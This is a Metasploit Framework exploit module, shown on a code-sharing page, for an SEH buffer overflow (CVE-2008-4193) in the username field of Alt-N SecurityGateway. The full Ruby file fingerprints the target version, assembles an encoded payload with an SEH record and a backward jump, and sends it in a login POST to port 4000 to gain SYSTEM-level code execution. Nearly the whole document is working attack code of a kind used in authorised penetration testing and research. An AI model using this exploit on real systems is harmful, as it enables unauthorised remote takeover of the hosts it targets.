Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/altn_securitygateway.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  # XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }

10


11
  include Msf::Exploit::Remote::HttpClient

12
  include Msf::Exploit::Seh

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Alt-N SecurityGateway username Buffer Overflow',

19
        'Description' => %q{

20
          Alt-N SecurityGateway is prone to a buffer overflow condition. This

21
          is due to insufficient bounds checking on the "username"

22
          parameter. Successful exploitation could result in code

23
          execution with SYSTEM level privileges.

24


25
          NOTE: This service doesn't restart, you'll only get one shot. However,

26
          it often survives a successful exploitation attempt.

27
        },

28
        'Author' => [ 'jduck' ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          [ 'CVE', '2008-4193' ],

32
          [ 'OSVDB', '45854' ],

33
          [ 'BID', '29457']

34
        ],

35
        'Privileged' => true,

36
        'DefaultOptions' => {

37
          'EXITFUNC' => 'thread',

38
        },

39
        'Payload' => {

40
          'Space' => 476,

41
          # note: 0xd7 might not be translated, but w/e

42
          'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'),

43
          'StackAdjustment' => -3500,

44
          'EncoderType' => Msf::Encoder::Type::SingleStaticBit,

45
          'EncoderOptions' =>

46
                        {

47
                          'BitNumber' => 0x5,

48
                          'BitValue' => true,

49
                        }

50
        },

51
        'Platform' => 'win',

52
        'Targets' => [

53
          [ 'Automatic Targeting', {} ],

54
          # NOTE: the return address must be tolower() safe

55
          [ 'SecurityGateway 1.0.1 Universal', { 'Ret' => 0x6767756f }], # p/p/r in XceedZip.dll 4.5.77.0

56
        ],

57
        'DefaultTarget' => 0,

58
        'DisclosureDate' => '2008-06-02',

59
        'Notes' => {

60
          'Reliability' => UNKNOWN_RELIABILITY,

61
          'Stability' => UNKNOWN_STABILITY,

62
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
        }

64
      )

65
    )

66


67
    register_options(

68
      [

69
        Opt::RPORT(4000)

70
      ]

71
    )

72
  end

73


74
  # Identify the target based on the SecurityGateway version number

75
  def auto_target

76
    info = http_fingerprint({ :uri => '/SecurityGateway.dll' }) # automatic targetting

77
    if (info =~ /SecurityGateway (1\..*)$/)

78
      case $1

79
      when /1\.0\.1/

80
        return self.targets[1]

81
      end

82
    end

83
    # Not vulnerable

84
    nil

85
  end

86


87
  def check

88
    if auto_target

89
      Exploit::CheckCode::Appears

90
    end

91
    Exploit::CheckCode::Safe

92
  end

93


94
  def exploit

95
    # handle auto-targeting

96
    mytarget = target

97
    if target.name =~ /Automatic/

98
      print_status("Attempting to automatically select a target...")

99
      mytarget = auto_target

100
      if mytarget.nil?

101
        fail_with(Failure::NoTarget, "Unable to automatically select a target")

102
      end

103
      print_status("Automatically selected target \"#{mytarget.name}\"")

104
    end

105


106
    # the buffer gets CharLowerBuff()'d and passed to:

107
    # sprintf(str, "Attempt to login with invalid user name %s from %s", buf, ip_str);

108


109
    sploit = payload.encoded

110
    sploit << generate_seh_record(mytarget.ret)

111
    distance = payload_space + 8

112
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

113
    sploit = Rex::Text.to_hex(sploit, '%')

114
    sploit << rand_text_alphanumeric(512)

115


116
    post_data = 'RequestedPage=login'

117
    post_data << '&username=' << sploit

118
    post_data << '&passwd=world'

119


120
    print_status("Sending request...")

121
    res = send_request_cgi({

122
      'uri' => '/SecurityGateway.dll',

123
      'method' => 'POST',

124
      'content-type' => 'application/x-www-form-urlencoded',

125
      'data' => post_data,

126
    }, 5)

127


128
    handler

129
  end

130
end

131


132